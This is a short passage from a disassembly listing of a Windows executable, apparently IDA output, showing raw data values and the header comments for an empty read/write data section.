0F608E059h, 9BB6CDE6h, 0FBB8738Bh dd 484E11B0h, 323815FFh, 498D0044h, 1CEh dup(0) dd 0FDF00000h, 7Fh, 13FBh dup(0) db 0 _gda_ ends ; Section 5. (virtual address 00033000) ; Virtual size : 00001000 ( 4096.) ; Section size in file : 00000200 ( 512.) ; Offset to raw data for section: 00032200 ; Flags C0000040: Data Readable Writable ; Alignment : default ; =========================================================================== ; Segment type: Pure data ; Segment permissions: Read/Write _idata2 segment para public 'DATA' use32 assume cs:_idata2 ;org 31453000h align 2000h _idata2 ends end start